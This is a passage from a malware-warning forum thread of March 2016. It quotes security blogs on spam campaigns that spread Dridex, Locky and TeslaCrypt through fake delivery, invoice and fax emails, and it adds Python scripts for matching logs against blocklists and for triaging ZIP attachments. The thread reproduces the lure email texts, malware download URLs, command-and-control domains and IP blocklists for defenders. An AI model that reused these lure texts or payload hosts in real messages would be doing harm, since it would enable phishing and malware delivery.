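            f"sub-domain uses a free certificate ({sub.cert_issuer}) that the apex does not")

    return indicators


if __name__ == "__main__":
    # Values quoted in the post above; the issuer is a constructed example value.
    apex = HostProfile("exeterquads.com", "5.196.39.216", "Microsoft-IIS/8.5")
    rogue = HostProfile("cdn.exeterquads.com", "5.63.145.76", "nginx/1.0.15",
                        cert_issuer="Let's Encrypt")
    for line in shadowing_indicators(apex, rogue):
        print("-", line)
```

None of the four indicators is conclusive on its own (plenty of legitimate sites put a CDN sub-domain on another provider), which is why the function returns the whole list rather than a verdict; an ad-network vetting process would weigh several together and then confirm with WHOIS history or the registrant, as Malwarebytes did.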


#1678 AplusWebMaster

Posted 17 March 2016 - 05:42 AM

FYI...

Fake 'Interparcel Documents' SPAM - malicious attachment
- http://blog.dynamoo....-documents.html
17 Mar 2016 - "This spam email does not come from Interparcel but is instead a simple forgery with a malicious attachment:
    From:    Interparcel [bounce@ interparcel .com]
    Date:    17 March 2016 at 08:51
    Subject:    Interparcel Documents
    Your Interparcel collection has been booked and your documents are ready.
    There is a document attached to this email called Shipping Labels (620486055838).doc.
    Please open and print this attachment and cut out the waybill images. They must be attached to your parcels before the driver arrives.
    Thank you for booking with Interparcel.


Attached is a randomly-named document that matches the reference in the email (e.g. Shipping Labels (620486055838).doc) of which I have seen two variants (VirusTotal results [1] [2]). These two Malwr reports [3] [4] show Dridex-like download locations at:
gooddrink .com.tr/wp-content/plugins/hello123/56h4g3b5yh.exe
ziguinchor.caravanedesdixmots .com/wp-content/plugins/hello123/56h4g3b5yh.exe
The detection rate for the binary is 5/57*. This DeepViz report** on the binary shows network connections to:
195.169.147.26 (Culturegrid.nl, Netherlands)
64.76.19.251 (Level 3, US / Impsat, Argentina)
91.236.4.234 (FHU Climax Rafal Kraj, Poland)
188.40.224.78 (Hetzner / NoTaG Community, Germany)
As mentioned before, these characteristics look like the Dridex banking trojan.
Recommended blocklist:
195.169.147.26
64.76.19.251
91.236.4.234
188.40.224.78
"
1] https://www.virustot...sis/1458205307/

2] https://www.virustot...sis/1458205319/

3] https://malwr.com/an...DBhYTAzNDdlZTM/
Hosts
185.85.191.251

4] https://malwr.com/an...jllNjU1MzM1NzY/
Hosts
62.210.16.61

* https://www.virustot...sis/1458206236/

** https://sandbox.deep...6ee5d6ec6746d8/

- https://myonlinesecu...eads-to-dridex/
17 Mar 2016 - "An email with the subject of 'Interparcel Documents' pretending to come from Interparcel <bounce@ interparcel .com> with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: Interparcel <bounce@ interparcel .com>
Date: none
Subject: Interparcel Documents
Attachment: Shipping Labels (642079569307).doc
    Your Interparcel collection has been booked and your documents are ready.
    There is a document attached to this email called Shipping Labels (642079569307).doc.
    Please open and print this attachment and cut out the waybill images. They must be attached to your parcels before the driver arrives.
    Thank you for booking with Interparcel.


17 March 2016: Shipping Labels (642079569307).doc - Current Virus total detections 8/57*
.. MALWR** shows a download from http ://www.corecircle .it/wp-content/plugins/hello123/56h4g3b5yh.exe (VirusTotal ***) This is likely to be the Dridex banking Trojan. Hybrid Analysis[4]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458204597/

** https://malwr.com/an...jVhNTYzNDg4NGE/
Hosts
62.149.142.224

*** https://www.virustot...sis/1458205050/

4] https://www.hybrid-a...environmentId=4
Host Addresses
195.169.147.26
64.76.19.251

___

Fake 'Remittance Adivce' SPAM - doc malware leads to Dridex
- https://myonlinesecu...eads-to-dridex/
17 Mar 2016 - "An email with the subject of 'Remittance Adivce' pretending to come from random names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... Note the -misspelling- in the subject 'Remittance Adivce' instead of 'Remittance Advice' which should be enough to raise warning flags. One of the emails looks like:
From: Gill.Wilmer07@ urbanmountainhomes .com
Date: Thu 17/03/2016 09:16
Subject: Remittance Adivce
Attachment: remitadv_ana.doc
Please find attached a remittance advice for payment made yo you today.
Please contact the accounts team on 020 7523 2565 or via reply email for any queries regarding this payment.
Kind Regards
Wilmer Gill


17 March 2016: remitadv_ana.doc - Current Virus total detections 1/57*
.. MALWR** shows a download from http ://bakery.woodwardcounseling .com/michigan/map.php which gave me crypted120med.exe (virustotal 3/56***) MALWR[4] which looks like Dridex banking Trojan... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458206097/

** https://malwr.com/an...zA3NGM5YjUwY2M/
Hosts
217.12.199.94
188.93.239.28


*** https://www.virustot...sis/1458204974/
TCP connections
38.64.199.33
104.86.111.136


4] https://malwr.com/an...2E1ZWQyMzJlMjA/
Hosts
188.93.239.28

- http://blog.dynamoo....divce-from.html
17 Mar 2016 - "This fake financial spam has a malicious attachment and poor spelling in the subject field.
    From:    Booth.Garth19@ idsbangladesh .net.bd
    Date:    17 March 2016 at 09:17
    Subject:    Remittance Adivce
    Please find attached a remittance advice for payment made yo you today.
    Please contact the accounts team on 020 2286 7847 or via reply email for any queries regarding this payment.
    Kind Regards
    Garth Booth


... Recommended blocklist:
217.12.199.94
38.64.199.33
188.93.239.28
85.17.155.148
"
___

Fake 'Documentxx' SPAM - leads to Locky
- http://blog.dynamoo....apparently.html
17 Mar 2016 - "This spam appears to come from-the-victim, but this is just a simple forgery (explained here*). Attached is a ZIP file beginning "Document" followed by a one or two digit random number, which matches the subject. There is -no- body text. Here is an example:
    From:    victim@ domain .tld
    To:    victim@ domain .tld
    Date:    17 March 2016 at 10:37
    Subject:    Document32


* http://blog.dynamoo....yself-spam.html
Inside is a randomly-named script (samples VirusTotal reports [1] [2]..). These Malwr reports [8] [9].. indicate that the -script- attempts to download a binary from the following locations:
escortbayan.xelionphonesystem .com/wp-content/plugins/hello123/89h8btyfde445.exe
fmfgrzebel .pl/wp-content/plugins/hello123/89h8btyfde445.exe
superiorelectricmotors .com/wp-content/plugins/hello123/89h8btyfde445.exe
sabriduman .com/wp-content/plugins/hello123/89h8btyfde445.exe
bezerraeassociados .com.br/wp-content/plugins/hello123/89h8btyfde445.exe
The dropped binary has a detection rate of just 2/57**. Those reports and these other automated analyses [14] [15].. show network traffic to:
78.40.108.39 (PS Internet Company LLC, Kazakhstan)
46.148.20.46 (Infium UAB, Ukraine)
188.127.231.116 (SmartApe, Russia)
195.64.154.114 (Ukrainian Internet Names Center, Ukraine)
This is Locky ransomware.
Recommended blocklist:
78.40.108.39
46.148.20.46
188.127.231.116
195.64.154.114
"
1] https://www.virustot...sis/1458212406/

2] https://www.virustot...sis/1458212403/

8] https://malwr.com/an...Tg3MTBkODYzNTE/

9] https://malwr.com/an...WE4YWQyMmQwNGU/

** https://www.virustot...sis/1458213349/

14] https://malwr.com/an...TdiNTczMDNjZDE/

15] https://www.hybrid-a...environmentId=4
___

Fake 'PDFPart2.pdf' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
17 Mar 2016 - "An email with the subject of 'PDFPart2.pdf' pretending to come from Administrator admin@ your-own-email domain with a zip attachment is another one from the current bot runs which downloads Locky ransomware... The -broken- email looks like:
From: Administrator admin@ your own email domain
Date: Thu 17/03/2016 12:34
Subject: PDFPart2.pdf
Attachment: PDFPart2.zip
—-_com.android.email_2732400748040
Content-Type: multipart/alternative; boundary=”–_com.android.email_2732400748040″
—-_com.android.email_2732400748040 ...

.. When it is fixed...
From: Administrator admin@ your own email domain
Date: Thu 17/03/2016 12:34
Subject: PDFPart2.pdf
Attachment: PDFPart2.zip
    Sent from my Samsung Galaxy Note 4 – powered by Three


17 March 2016: PDFPart2.zip: Extracts to: MNS2053291109.js - Current Virus total detections 6/57*
.. MALWR** shows a download of Locky ransomware from
  http ://www.tuttiesauriti .org/wp-content/plugins/hello123/89h8btyfde445.exe (VirusTotal 5/56***) which although the same file name as today’s earlier locky malspam run is a -different- binary.. A second version CHR5185491610.js (VirusTotal [4]).. MALWR shows a download of the -same- Locky ransomware from
 http ://cepteknik .org/wp-content/plugins/hello123/89h8btyfde445.exe ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458220341/

** https://malwr.com/an...WYxYWVhNThhY2E/
Hosts
62.149.140.49: https://www.virustot...49/information/
78.40.108.39

*** https://www.virustot...sis/1458220984/
TCP connections
78.40.108.39: https://www.virustot...39/information/
>> https://www.virustot...0a495/analysis/

4] https://www.virustot...sis/1458221038/

- http://blog.dynamoo....nt-from-my.html
17 Mar 2016 - "This spam run has a malicious attachment. It appears to come from within the user's own domain.
    From:    Administrator [admin@ victimdomain .tld]
    Date:    17 March 2016 at 12:54
    Subject:    PDFPart2.pdf
    Sent from my Samsung Galaxy Note 4 - powered by Three
    Sent from my Samsung Galaxy Note 4 - powered by Three


All the attachments that I saw were corrupt, but it appears to be trying to download a -script- that installs Locky ransomware..."
___

Fake 'Invoice' SPAM - RTF malware leads to Dridex
- https://myonlinesecu...eads-to-dridex/
17 Mar 2016 - "An email with the subject of 'Invoice DOINV32142' from Tip Top Delivery (random characters) pretending to come from random email addresses with a malicious word doc RTF attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...ce-1024x783.png

17 March 2016: Invoice_DOINV32142_from_tip_top_delivery.rtf - Current Virus total detections 3/57*
.. MALWR** shows a download of what looks like Dridex banking Trojan from
 http ://parts.woodwardcounselinginc .com/michigan/map.php which gave me twitt_us.exe (VirusTotal 3/57***).
It looks like a continuation of this earlier Dridex malspam[1] with similar sites... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458235091/

** https://malwr.com/an...WIyNWIwYTgzN2M/
Hosts
176.107.177.85
188.93.239.28
8.254.249.62


*** https://www.virustot...sis/1458235750/
TCP connections
188.93.239.28
104.86.111.136


1] https://myonlinesecu...eads-to-dridex/
 



Edited by AplusWebMaster, 17 March 2016 - 02:12 PM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1679 AplusWebMaster

Posted 18 March 2016 - 05:43 AM

FYI...

Teslacrypt SPAM: 'Unpaid Issue…'
- https://blog.malware...n-unpaid-issue/
Mar 18, 2016 - "We have all seen the current upsurge in Ransomware attacks. It has been covered on an international scale, with new variants appearing at a very fast pace; some target Windows, some target Macs and some have cross-platform capabilities... The email seen below is an example of how the orchestrated attack is carried out (thanks to Conrad Longmore* for the email example):
From: Jennie bowles
Date: 10 March 2016 at 12:27
Subject: GreenLand Consulting – Unpaid Issue No. 58833
Dear Client! For the third time we are reminding you about your unpaid debt. You used to ask for our advisory services in July 2015, the receipt issued to you was recognized in our database with No. 58833. But it has never been paid off. We enclose the detailed bill for your recollection and sincerely hope that you will act nobly and responsibly. Otherwise we will have to start a legal action against you.
Respectfully,
Jennie bowles
Chief Accountant
707 Monroe St FL 58833 928-429-4994

The emails usually contain a ZIP file which contains a malicious script/downloader. Upon running this specific malicious script/downloader I was greeted by Teslacrypt ransomware (69.exe) from:
 hellomississmithqq[.]com /
IP: 54.212.162.6: https://www.virustot....6/information/
>> https://www.virustot...2a41e/analysis/
... below are some of the associated domains / IPs identified from the above sample. This Teslacrypt ransomware campaign has recently morphed into a hybrid Teslacrypt/Locky ransomware campaign. The aforementioned domain hellomississmithqq[.]com was seen serving up both Teslacrypt and Locky Ransomware on 10 March 2016).
Identified command and control:
multibrandphone[.]com
vtechshop[.]net
sappmtraining[.]com
shirongfeng[.]cn
controlfreaknetworks[.]com
tele-channel[.]com
Associated IP addresses with hellomississmithqq[.]com:
46.108.108.182
54.212.162.6
78.135.108.94
134.19.180.8
202.120.42.190
216.150.77.21
142.25.97.48
202.120.42.190

... Ransomware is not going away; on the contrary it is becoming more and more prevalent, with new variants coming out at a fast pace and targeting multiple platforms. It is recommended that users use anti-malware protection, especially one that has a website protection option..."
* http://blog.dynamoo.com/
___

Evil networks to block 2016-03-18
- http://blog.dynamoo....2016-03-18.html
18 Mar 2016 - "A follow-up to this list* posted a few days ago. These networks are primarily distributing Angler and in my opinion you should -block- their entire ranges to be on the safe side...
85.204.74.0/24
89.45.67.0/24
89.108.83.0/24
148.251.249.96/28
184.154.89.128/29
184.154.135.120/29
185.30.98.0/23
185.117.73.0/24
185.141.25.0/24
194.1.237.0/24
212.22.85.0/24
217.12.210.128/25
"
* http://blog.dynamoo....2016-03-07.html
___

Fake 'Proof of Delivery' SPAM - doc macro malware leads to Dridex
- https://myonlinesecu...eads-to-dridex/
18 Mar 2016 - "An email with the subject of 'Proof of Delivery Report: 16/03/16-17/03/16' pretending to come from UKMail Customer Services <list_reportservices@ ukmail .com> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...31-1024x763.png

18 March 2016: poddel-pdf-2016031802464600.docm - Current Virus total detections 9/57*
.. MALWR** shows a download from http ://felipemachado .com/wp-content/plugins/hello123/r34t4g33.exe
(VirusTotal 9/57***) which looks like Dridex banking Trojan... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1458295346/

** https://malwr.com/an...WQ4YzJjMWNiNzc/
Hosts
93.104.215.155
64.147.192.68
184.25.56.51


*** https://www.virustot...sis/1458295346/

- http://blog.dynamoo....ery-report.html
18 Mar 2016 - "This spam does not come from UKMail but is instead a simple -forgery- with a malicious attachment:
    From:    UKMail Customer Services [list_reportservices@ ukmail.com]
    Date:    18 March 2016 at 02:46
    Subject:    Proof of Delivery Report: 16/03/16-17/03/16
    Dear Customer,
    Please find attached your requested Proof of Delivery (POD) Download Report
    ATTACHED FILE: POD DOWNLOAD ...


At the time of writing I have seen just a single sample with an attachment named poddel-pdf-2016031802464600.docm ...
Recommended blocklist:
64.147.192.68
64.76.19.251
91.236.4.234
188.40.224.78
"
___

Fake 'Attached Image' SPAM - JS malware leads to Locky ransomware
- https://myonlinesecu...cky-ransomware/
18 Mar 2016 - "A -blank- email with the subject of 'Attached Image' pretending to come from a scanner, copier or multi-functional device at your-own-domain with a random numbered zip attachment is another one from the current bot runs which downloads Locky ransomware... The email looks like:
From: scanner or copier at your-own-email domain
Date: Fri 18/03/2016 10:24
Subject: Attached Image pretending to come from a scanner or copier at your own domain
Attachment: 9369_001.zip (all random numbers)


Body content: totally blank

5 March 2016: 9369_001.zip : Extracts to: AGK4044783108.js - Current Virus total detections 2/57*
.. MALWR** shows a download of Locky ransomware from
 http ://naairah .com/wp-content/plugins/hello123/j7u7h54h5.exe (VirusTotal 2/55***)  
.. MALWR[4] and from http ://robyrogers .com.au/wp-content/plugins/hello123/8888ytc6r.exe (VirusTotal 4/57[5])... This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a DOC or other normal file instead of the .exe/JS file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458300821/

** https://www.virustot...sis/1458300821/
Hosts
149.202.201.228
46.148.20.46
27.131.66.9
195.154.126.159


*** https://www.virustot...sis/1458301083/
TCP connections
46.148.20.46

4] https://malwr.com/an...mY0MWQ5NjkzMzg/
Hosts
185.82.216.143

5] https://www.virustot...sis/1458301375/
___

Fake 'FedEx' SPAM - JS malware leads to ransomware
- https://myonlinesecu...-to-ransomware/
18 Mar 2016 - "An email with the subject of 'FedEx_00196222.zip' pretending to come from mogotoys@ server.robo-apps .com; on behalf of; FedEx 2Day <shawn.maddox@ mogotoys .com> with a zip attachment is another one from the current bot runs which downloads ransomware... The email looks like:
From: mogotoys@ server.robo-apps .com; on behalf of; FedEx 2Day <shawn.maddox@ mogotoys .com>
Date: Fri 18/03/2016 02:49
Subject: Problems with item delivery, n.00196222
Attachment: FedEx_00196222.zip
    Dear Customer,
    Your parcel has arrived at March 15. Courier was unable to deliver the parcel to you.
    Shipment Label is attached to email.
    Yours sincerely,
    Shawn Maddox,
    Sr. Station Agent.


18 March 2016: FedEx_00196222.zip: Extracts to: FedEx_00196222.doc.js - Current Virus total detections 12/57*
.. Wepawet** shows downloads from a combination of these -5- locations:
evakuator-lska .com.ua | rpexpress .qc.ca | omergoksel .com | web.benzol .net.pl | cspfc.immo .perso.sf
.. Hybrid analysis*** shows the download location to be
 evakuator-lska .com.ua where it gave -2- files VirusTotal [1][2] which look like Kovter and Boaxxe...
This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a DOC or other normal file instead of the .exe/JS file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458279168/

** https://wepawet.isec...eef4046&type=js

*** https://www.reverse....environmentId=1
Contacted Hosts
78.109.16.100
28.59.23.77
47.206.106.113
145.24.135.107
178.33.69.66
87.118.110.192
189.60.150.37
28.29.231.118

DNS Requests
evakuator-lska .com.ua: 78.109.16.100: https://www.virustot...00/information/
>> https://www.virustot...64c5c/analysis/
find-dentalimplants .com: 173.201.146.128: https://www.virustot...28/information/
>> https://www.virustot...76076/analysis/

1] https://www.virustot...sis/1458249226/

2] https://www.virustot...sis/1458282807/
 



Edited by AplusWebMaster, 18 March 2016 - 10:58 AM.

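Added example, not part of the forum post above or of the dynamoo.com and myonlinesecurity posts it quotes: the "Evil networks to block" CIDR ranges and the single-IP "Recommended blocklist" entries published above only pay off once they are matched against what your own proxy or firewall actually logged. The script below loads exactly those published entries with Python's ipaddress module (so a bare address and a /23 range are handled the same way) and walks a handful of constructed proxy/firewall log lines, which are not from the page, reporting every destination that falls inside a listed range. Log format, timestamps and the internal 10.0.0.x sources are assumptions for illustration.

```python
"""Match IPs seen in logs against the blocklists quoted in this thread.

Added example, not code from the blog posts quoted above. The network
ranges and single addresses are copied from the dynamoo.com blocklists
reproduced in this post; the log lines are constructed for illustration.
"""
import ipaddress
import re

# CIDR ranges from "Evil networks to block 2016-03-18" and single IPs from the
# "Recommended blocklist" in the UKMail post. A bare IP is treated as a /32.
BLOCKLIST_ENTRIES = [
    "85.204.74.0/24", "89.45.67.0/24", "89.108.83.0/24", "148.251.249.96/28",
    "184.154.89.128/29", "184.154.135.120/29", "185.30.98.0/23",
    "185.117.73.0/24", "185.141.25.0/24", "194.1.237.0/24", "212.22.85.0/24",
    "217.12.210.128/25",
    "64.147.192.68", "64.76.19.251", "91.236.4.234", "188.40.224.78",
]


def build_blocklist(entries):
    """Parse published ranges/addresses into ip_network objects."""
    nets = []
    for entry in entries:
        # strict=False tolerates a published range with host bits set
        nets.append(ipaddress.ip_network(entry.strip(), strict=False))
    return nets


def is_blocked(ip, nets):
    """Return the first network containing ip, or None if it is not listed."""
    addr = ipaddress.ip_address(ip)
    for net in nets:
        if addr in net:
            return net
    return None


# Plain dotted-quad matcher; candidates are validated by ip_address() below.
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def scan_log(lines, nets):
    """Return (line_no, ip, matched_network) for every blocked IP in the log."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        for ip in IPV4_RE.findall(line):
            try:
                net = is_blocked(ip, nets)
            except ValueError:
                continue  # e.g. 300.1.2.3 matched the regex but is not an IP
            if net is not None:
                hits.append((line_no, ip, str(net)))
    return hits


# Constructed proxy/firewall log lines (not from the original page).
SAMPLE_LOG = [
    "2016-03-18T10:24:01 proxy ALLOW 10.0.0.15 -> 85.204.74.17:80 GET /index.php",
    "2016-03-18T10:24:03 proxy ALLOW 10.0.0.15 -> 93.184.216.34:443 CONNECT",
    "2016-03-18T10:25:10 fw    ALLOW 10.0.0.22 -> 64.147.192.68:443 TCP",
    "2016-03-18T10:25:12 fw    ALLOW 10.0.0.22 -> 185.30.99.200:80 TCP",
    "2016-03-18T10:25:13 fw    ALLOW 10.0.0.22 -> 185.30.100.5:80 TCP",
]

if __name__ == "__main__":
    blocklist = build_blocklist(BLOCKLIST_ENTRIES)
    for line_no, ip, net in scan_log(SAMPLE_LOG, blocklist):
        print(f"line {line_no}: {ip} is in blocked range {net}")
```

Note the fourth sample line: 185.30.99.200 is not in the list as written, but it sits inside 185.30.98.0/23, which is the point of blocking the whole range rather than the single addresses a sandbox happened to report; 185.30.100.5 on the next line is just outside it and is correctly left alone.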


#1680 AplusWebMaster

Posted 21 March 2016 - 10:58 AM

FYI...

Fake 'Fax transmission' SPAM - malicious script attachment
- http://blog.dynamoo....ervice-fax.html
21 Mar 2016 - "This -fake- fax spam appears to come from within the victim's own domain, but it doesn't. Instead it is just a simple -forgery- with a malicious attachment.
    From:    FX Service [emailsend@ w.e191.victimdomain .tld]
    Date:    21 March 2016 at 14:32
    Subject:    Fax transmission: -7172277033-1974602246-2016032111285-47417.tiff
    Please find attached to this email a facsimile transmission we
    have just received on your behalf
    (Do not reply to this email as any reply will not be read by
    a real person)


Details will vary from message to message. Attached is a ZIP file with a name that broadly matches the one referred to in the subject (e.g. F-7172277033-1974602246-2016032111285-47417.zip) which contains any one of a wide-number-of-malicious-scripts (some example VirusTotal results [1] [2]..). Malwr analysis of those samples [6] [7].. shows binary download locations at:
http ://modaeli .com/89h766b.exe
http ://spormixariza .com/89h766b.exe
http ://sebastiansanni .org/wp-content/plugins/hello123/89h766b.exe
http ://cideac .mx/wp-content/plugins/hello123/89h766b.exe
There are probably other download locations too. The dropped binary has a VirusTotal detection rate of just 2/56*. This Malwr report** of the payload indicates that it is Locky ransomware.
All of those sources plus this Deepviz report*** show network traffic to the following IPs:
195.64.154.126 (Ukrainian Internet Names Center, Ukraine)
92.63.87.106 (MWTV, Latvia)
84.19.170.244 (Keyweb AG, Germany / 300GB.ru, Russia)
217.12.199.90 (ITL Company, Ukraine) ...
Recommended blocklist:
195.64.154.126
92.63.87.106
84.19.170.244
217.12.199.90
"
1] https://www.virustot...9f7a3/analysis/

2] https://www.virustot...83fc1/analysis/

6] https://malwr.com/an...WVkOTE4YjdiYWY/

7] https://malwr.com/an...WFjYzNmYzg3NmU/

* https://www.virustot...sis/1458575289/

** https://malwr.com/an...2I5NTJiYjg4MGY/

*** https://sandbox.deep...d352ae1d944c2a/
___

Fake 'Your account ID... has been suspended' SPAM - JS malware leads to Teslacrypt
- https://myonlinesecu...-to-teslacrypt/
21 Mar 2016 - "An email with the subject of 'Your account ID:98938 has been suspended' [random numbered] coming from random names and email addresses with a zip attachment is another one from the current bot runs which downloads teslacrypt... The email looks like:
From: random email addresses
Date: Beatriz gepp <geppBeatriz957@ jjdior .com>
Subject:  Your account ID:98938 has been suspended.
Attachment: warning_letter_34692556.zip
    Your bank account associated with the ID:98938 has been suspended because of the unusual activity connected to this account and a failure of the account holder to pay the taxes on a due date.
    Your debt: - 394,42 USD
    For more details and the information on how to unlock your account please refer to the document attached.


21 March 2016: warning_letter_34692556.zip: Extracts to: letter_I22vNL.js - Current Virus total detections 15/56*
.. MALWR** shows a download of teslacrypt from http ://grandmahereqq .com/80.exe?1 (VirusTotal ***)
Note: this also tries to download http ://google .com/80.exe?1 which does-not-exist... This is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a DOC or other normal file instead of the .exe/JS file it really is, making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1458579387/

** https://malwr.com/an...GJmYzlkZjVmNGQ/
Hosts
54.212.162.6
216.58.192.14


*** https://www.virustot...sis/1458581354/
___

Hacked Canadian Hospital Website serves Ransomware
- https://blog.malware...hacked-website/
Mar 21, 2016 - "... Norfolk General Hospital, based in Ontario, became a teaching facility for McMaster University’s Faculty of Health Sciences in 2009. The web portal is powered by the Joomla CMS, running version 2.5.6 (latest version is 3.4.8) according to a manifest file present on their server. Several vulnerabilities exist for this outdated installation, which could explain why the site has been hacked. Our honeypots visited the hospital page and got infected with ransomware via the Angler exploit kit. A closer look at the packet capture revealed that malicious-code leading to the exploit kit was -injected- directly into the site’s source code itself. Like many site hacks, this injection is conditional and will appear only -once- for a particular IP address. For instance, the site administrator who often visits the page will only see a clean version of it, while first timers will get served the exploit and malware:
> https://blog.malware...016/03/Flow.png
The particular strain of ransomware dropped here is -TeslaCrypt- which demands $500 to recover your personal files it has encrypted. That payment doubles after a week... We contacted the Norfolk hospital and eventually were able to speak with their IT staff. We shared the information we had (screenshots, network packet capture) and told them about the ransomware payload we collected when we reproduced the attack in our lab. We were told that they were working on upgrading their version of Joomla with their hosting provider..."

Norfolk General Hospital - Ontario: ngh.on .ca: 205.150.58.124:
>> https://www.virustot...43773/analysis/
 



Edited by AplusWebMaster, 21 March 2016 - 01:04 PM.

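Added example, not part of the forum posts above or of the myonlinesecurity and dynamoo.com write-ups they quote: nearly every lure in this thread is a ZIP holding either a script with a spoofed document icon (FedEx_00196222.doc.js, MNS2053291109.js, letter_I22vNL.js) or a macro-enabled Office file (poddel-pdf-2016031802464600.docm), and the posts' advice is to show known file extensions and never enable macros. The script below is the mail-gateway or help-desk check that follows from that advice: it lists each member of a ZIP attachment without extracting anything to disk and flags script or executable extensions, the .doc.js style of double extension that Windows' default "hide extensions" setting conceals, and macro-enabled document types. The member names are the ones reported in the posts; the archive contents are dummy bytes constructed here so the script runs offline, and the extension sets are this example's own, not taken from the page.

```python
"""Triage e-mail ZIP attachments for the lures described in this thread.

Added example, not code from the posts quoted above. The attachment and
member names are the ones reported in the posts; the archive contents are
dummy bytes constructed here so the script runs offline.
"""
import io
import zipfile
from typing import List, Tuple

# Extensions Windows hands straight to WScript, cmd or the PE loader on a
# double-click. Hiding these behind a document icon is the trick the posts
# describe. These sets are this example's own, not taken from the page.
SCRIPT_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "bat", "cmd", "ps1"}
BINARY_EXTS = {"exe", "scr", "pif", "com", "dll", "cpl"}
MACRO_EXTS = {"docm", "xlsm", "pptm", "dotm", "xltm"}
DOC_LIKE_EXTS = {"doc", "docx", "pdf", "xls", "xlsx", "rtf", "jpg", "png", "txt"}


def classify_name(name: str) -> List[str]:
    """Return the reasons a member filename is suspicious (empty = none found)."""
    reasons: List[str] = []
    base = name.rsplit("/", 1)[-1].lower()   # strip any directory prefix
    parts = base.split(".")
    if len(parts) < 2:
        return reasons                       # no extension at all
    ext = parts[-1]
    if ext in SCRIPT_EXTS:
        reasons.append(f"script payload (.{ext})")
    elif ext in BINARY_EXTS:
        reasons.append(f"executable payload (.{ext})")
    elif ext in MACRO_EXTS:
        reasons.append(f"macro-enabled Office document (.{ext})")
    # "FedEx_00196222.doc.js": a document extension in front of the real one,
    # which is exactly what the default "hide known extensions" setting hides.
    if len(parts) >= 3 and parts[-2] in DOC_LIKE_EXTS and (
        ext in SCRIPT_EXTS or ext in BINARY_EXTS
    ):
        reasons.append(f"double extension .{parts[-2]}.{ext}")
    return reasons


def triage_zip(data: bytes) -> List[Tuple[str, List[str]]]:
    """Inspect every member of a ZIP attachment without extracting it to disk."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = classify_name(info.filename)
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def make_zip(members) -> bytes:
    """Build an in-memory ZIP with constructed dummy content (test fixture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members:
            zf.writestr(name, content)
    return buf.getvalue()


# Attachment and member names taken from the posts above; contents are dummy bytes.
SAMPLES = {
    "FedEx_00196222.zip": make_zip([("FedEx_00196222.doc.js", b"// constructed placeholder\n")]),
    "PDFPart2.zip": make_zip([("MNS2053291109.js", b"// constructed placeholder\n")]),
    "9369_001.zip": make_zip([("AGK4044783108.js", b"// constructed placeholder\n")]),
    "warning_letter_34692556.zip": make_zip([("letter_I22vNL.js", b"// constructed placeholder\n")]),
    "pod.zip": make_zip([("poddel-pdf-2016031802464600.docm", b"constructed placeholder")]),
    "benign.zip": make_zip([("quarterly_report.pdf", b"%PDF-1.4 constructed placeholder")]),
}

if __name__ == "__main__":
    for attachment, blob in SAMPLES.items():
        findings = triage_zip(blob)
        print(f"{attachment}: {'QUARANTINE' if findings else 'pass'}")
        for member, reasons in findings:
            print(f"    {member}: {'; '.join(reasons)}")
```

The name check is deliberately the first, cheapest filter, not a replacement for detonating the sample: as the posts show, the same .js downloader fetched different binaries from different compromised WordPress hosts within hours, so the VirusTotal scores quoted above (2/57, 5/56) are what you should expect from signature scanning of a fresh run, while a script extension inside a ZIP that claims to be a PDF or a scan needs no signature at all.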
